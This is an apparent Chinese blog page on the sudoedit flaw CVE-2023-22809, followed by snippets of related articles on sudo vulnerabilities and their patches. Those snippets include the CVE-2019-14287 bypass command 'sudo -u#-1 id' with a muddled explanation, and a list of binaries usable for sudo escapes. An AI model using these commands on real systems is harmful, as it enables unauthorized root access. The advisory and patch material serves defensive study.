【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)
做自己喜欢的事,并将其发挥到极致!
04-05 8259
sudo 允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudosudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " –" 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表,最终在目标系统上实现权限提升。
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
最新发布
IronmanJay的博客
06-01 2161
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
sudo堆缓冲区溢出提权漏洞CVE-2021-3156
Ryan的博客
01-13 2787
sudo堆缓冲区溢出提权漏洞CVE-2021-3156
sudo提权漏洞详解与汇总
有勇气的牛排博客
07-22 588
目录1 介绍2 常见提权方法2.1 git 提权2.2 su2.3 zip2.4 tar2.5 strace2.6 nmap2.7 more2.8 ftp2.9 vim2.10 find2.11 passwd2.12 awk3 防止有sudo权限的普通用户修改root的密码 1 介绍 sudo是常用的Linux命令,允许普通用户执行root命令 原理: 普通用户在使用sudo执行命令的过程,会暂时拥有root权限,如过该命令执行没有断,而且该命令运行的过程可以调用系统命令,那就可以直接运行/bin/b
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:CVE-2021-3156
03-06
【描述】:“CVE-2021-3156”是一个严重且影响广泛的漏洞,被称为“Baron Samedit”或“SudoCmd”,它影响了广泛使用Sudo命令行工具,允许本地攻击者获得系统上的完全根权限。这个漏洞存在于Sudo的`sudoedit`命令...
Sudo 堆缓冲区溢出致本地提权漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 3041
2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
CentOS-7 普通用户sudo提权,获取最高权限--漏洞CVE-2019-14287
m0_74313947的博客
02-03 636
这个指令的意思是在tom账户登录的状态下,也就是普通用户而非最高管理员登录状态下,除了root用户其他用户都可以使用下面的id与whoami指令。这个漏洞可能会导致非特权用户以root用户的身份执行特权命令,进而获得系统的完全控制权限。使用用vim编辑器打开/etc/sudoers文件。将uid改成0,一般只有root的uid可以为0。这样就可以在tom下拿到root完全控制权限。然后使用切换成tom账户登录。
sudo提权
weixin_43258559的博客
02-12 352
作用:通常讲都是在执行命令的时候,以管理员的身份去执行,通常都是做提权。 方法:想修改的sudo条目,要编辑配置文件:/etc/sudoers vim /etc/sudoers root ALL=(ALL) 下面添加一行 每一个生效的行,代表了一个sudo条目 实现的功能:一个人要在那些主机上以另外那个人的身份,去运行那些命令。 例: leo ALL =(root) /bin/cat /bin/c...
CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)
AllenAker的博客
01-28 4216
CentOS升级sudo版本,解决Sudo权限绕过漏洞 堆缓冲区溢出漏洞CVE-2021- 3156漏洞介绍一、漏洞情况分析二、 漏洞影响范围升级环境准备安装检验 漏洞介绍 关于 Sudo 堆缓冲区溢出漏洞(CVE-2021- 3156)的预警通知 有关情报显示,sudo 存在缓冲区溢出漏洞。攻击者在取得服 务器基础权限的情况下,可以利用 sudo 基于堆的缓冲区溢出漏 洞,获得 root 权限。在 sudo 解析命令行参数的方式发现了基 于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudo
linux sudo提权漏洞,Linux sudo提权漏洞风险预警
weixin_39716521的博客
05-16 795
漏洞简介严重程度:低危CVE编号:CVE-2019-14287影响版本:sudo版本<1.8.28漏洞危害Linux sudo被曝出存在一个提权漏洞,可完全绕过sudo安全策略。sudo存在一个安全策略隐患,即便"sudoers configuration"配置文件明确表明不允许以root用户进行访问,但通过该漏洞,恶意用户或程序仍可在目标Linux系统上以root用户身份执行任意命令。...
Linux Sudo权限提升漏洞复现(CVE-2023-22809)
MrCaia的博客
08-17 816
CVE-2023-22809 Linux Sudo权限提升漏洞
Linuxsudo提权(简单明了一看就会!!!)
Aprilqxs的博客
06-03 1477
abc组 可以以tom用户的身份在server1主机上无密码执行 rm -rf , remove , del 命令。#abc 用户可以以任何用户身份在任何主机上无需密码的执行mkdir和useradd命令。#ABC用户可已在以任何用户身份在任何主机上 无需密码的执行任何命令。如果有用户需要做提权,就在这行下照格式写一行配置就OK了~用户 用户=(主机名) 命令列表。字段4(也就是最后的ALL): 执行的命令。字段2(ALL=):以哪个用户的身份。希望这些知识点对大家有帮助~~~~
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0(root) groups=0(root) ``` 这个命令的意思是以id为用户名,并以-1为用户ID,执行sudo的命令。这样一来,sudo会将命令以root用户的身份执行。攻击者可以利用这个漏洞来获取root权限,并执行其他恶意操作。 解决这个漏洞的方法是升级sudo到最新版本,并禁用旧版本的sudo。同时,管理员应该对系统进行定期的安全审计,并确保所有软件和系统组件都是最新的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值